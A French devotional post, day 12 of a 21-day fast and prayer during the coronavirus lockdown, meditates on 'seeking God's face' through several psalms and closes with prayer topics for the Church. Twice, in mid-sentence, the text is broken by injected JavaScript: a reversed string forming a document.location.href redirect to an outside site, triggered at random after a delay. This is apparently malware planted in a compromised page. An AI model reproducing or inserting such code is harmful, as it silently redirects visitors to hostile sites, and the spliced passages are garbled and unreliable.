21 jours de Jeûne et Prière : Jour 12

Appelés à chercher Sa face
Psaume 105 : 4
Ce temps de confinement est profitable à la réflexion et à la méditation de la Parole de Dieu. Or, durant ces dernières 24h, je suis tobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tombée trois fois sur l’expression « chercher Sa face », ce qui m’a conduit à examiner de plus près sa signification.
Ainsi, dans le second livre des Chroniques, il nous est dit :
« Si mon peuple sur qui est invoqué mon nom s’humilie, prie, et cherche ma face…» 2 Chroniques 7 : 14
En fait, lorsque nous nous approchons de Dieu dans le but d’implorer sa miséricorde et sa bonté, Il n’attend pas seulement de nous que nous nous humiliions et que nous priions. Il désire également que nous cherchions Sa face.
Mais que signifie cette expression ? Le Psaume 24 : 3-6 nous donne une réponse.
« Qui pourra monter à la montagne de l’Éternel ? Qui s’élèvera jusqu’à son lieu saint ? Celui qui a les mains innocentes et le cœur pur… Il obtiendra la bénédiction de l’Éternel… Voilà le partage de la génération qui l’invoque, De ceux qui cherchent ta face… » Psaume 24 : 3-6
Donc « chercher Sa face » c’est en réalité, chercher Sa Présence, chercher à connaître Son cœur et apprendre à connaître Ses voies. Chercher Sa face, c’est développer et approfondir notre intimité avec Lui, chercher à voir avec Ses yeux cette humanité qui se perd, ressentir Son cœur qui pleure pour elle, recevoir une révélation de Sa perspective des circonstances ou des personnes pour lesquelles nous prions. Sa Parole nous y exhorte vivement :
« Ayez recours à l’Éternel et à son appui, cherchez continuellement sa face ! » Psaume 105 : 4
Souvent nous nous contentobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tons seulement de chercher Sa Main (les guérisons, les miracles, l’intervention divine). Nous pouvons élever de nombreuses prières sans jamais chercher Sa face. Pourtant Dieu attend bien plus de nous. Il désire une relation d’amitié profonde, car ce n’est qu’à Ses amis qu’Il révèle Ses secrets.
Alors que nous nous approchons chaque jour de Lui avec nos fardeaux et nos requêtes, prenons le temps de chercher Sa face, désirons intensément Sa Présence et Il se révèlera à nous et nous conduira à intercéder de manière à faire une différence dans les lieux célestes et à changer le cours des événements présents.

Sujets de prière
Prions pour l’Eglise de Jésus-Christ :
– Pour qu’elle réponde à l’appel du Seigneur à chercher Sa face, à connaitre Sa présence.
– Pour une nouvelle consécration et une sanctification des croyants en ces temps particuliers.
– Pour une nouvelle ferveur pour la Parole de Dieu qui nous révèle Qui Il est.
– Pour une nouvelle onction du Saint-Esprit pour marcher dans les œuvres que le Seigneur attend qu’elle accomplisse
– Pour une révélation de la part du Seigneur de Ses plans et ses stratégies pour combattre cette plaie mondiale du coronavirus.
– Pour qu’elle se lève puissamment et fasse la différence dans ce monde ébranlé.
Ensemble, devant Sa face.